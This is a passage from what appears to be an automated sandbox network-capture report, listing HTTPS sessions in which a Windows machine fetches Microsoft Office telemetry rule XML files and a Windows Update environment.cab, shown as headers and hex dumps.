                                                                                                                                      Content-Type: text/plain
                                                                                                                                      Content-Length: 218853
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public
                                                                                                                                      Last-Modified: Wed, 27 Nov 2024 15:11:14 GMT
                                                                                                                                      ETag: "0x8DD0EF5BC53602D"
                                                                                                                                      x-ms-request-id: a5a19dc6-401e-008c-1dff-4086c2000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221058Z-174f7845968ljs8phC1EWRe6en00000010g000000000025a
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:10:58 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                      Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                      2024-11-29 22:10:58 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                      Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                      2024-11-29 22:10:58 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                      Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                      2024-11-29 22:10:58 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                      Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                      2024-11-29 22:10:58 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                      Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                      2024-11-29 22:10:58 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                      Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                      2024-11-29 22:10:58 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                      Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                      2024-11-29 22:10:59 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                      Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                      2024-11-29 22:10:59 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                      Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                      2024-11-29 22:10:59 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                      Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      28192.168.2.44977820.109.210.53443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:58 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=stBxbGhrHxDYMZ9&MD=gESBNraw HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                      2024-11-29 22:10:59 UTC560INHTTP/1.1 200 OK
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Expires: -1
                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                      ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                      MS-CorrelationId: 773e147a-1028-438f-927a-9e2728fa451a
                                                                                                                                      MS-RequestId: 10ab233a-c403-480a-9ea5-5847813c7d51
                                                                                                                                      MS-CV: msFeOx/wpUSybFzo.0
                                                                                                                                      X-Microsoft-SLSClientCache: 1440
                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:58 GMT
                                                                                                                                      Connection: close
                                                                                                                                      Content-Length: 30005
                                                                                                                                      2024-11-29 22:10:59 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                      Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                      2024-11-29 22:10:59 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                      Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      29192.168.2.44978113.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:00 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:01 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 450
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                      ETag: "0x8DC582BD4C869AE"
                                                                                                                                      x-ms-request-id: 22636776-e01e-0003-4fa8-420fa8000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221101Z-174f78459684db9fhC1EWRc7g400000000d00000000031r7
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:01 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      30192.168.2.44978213.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:00 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:01 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 2980
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                      x-ms-request-id: 0a3cdbcf-401e-0016-597f-3f53e0000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221101Z-174f7845968swgbqhC1EWRmnb400000010kg00000000mugz
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:01 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      31192.168.2.44978013.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:00 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:01 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 3788
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                      ETag: "0x8DC582BAC2126A6"
                                                                                                                                      x-ms-request-id: 0b3277ea-501e-00a0-5e91-3f9d9f000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221101Z-174f7845968cdxdrhC1EWRg0en00000010c000000000qh5r
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:01 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      32192.168.2.44978313.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:01 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:01 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 408
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
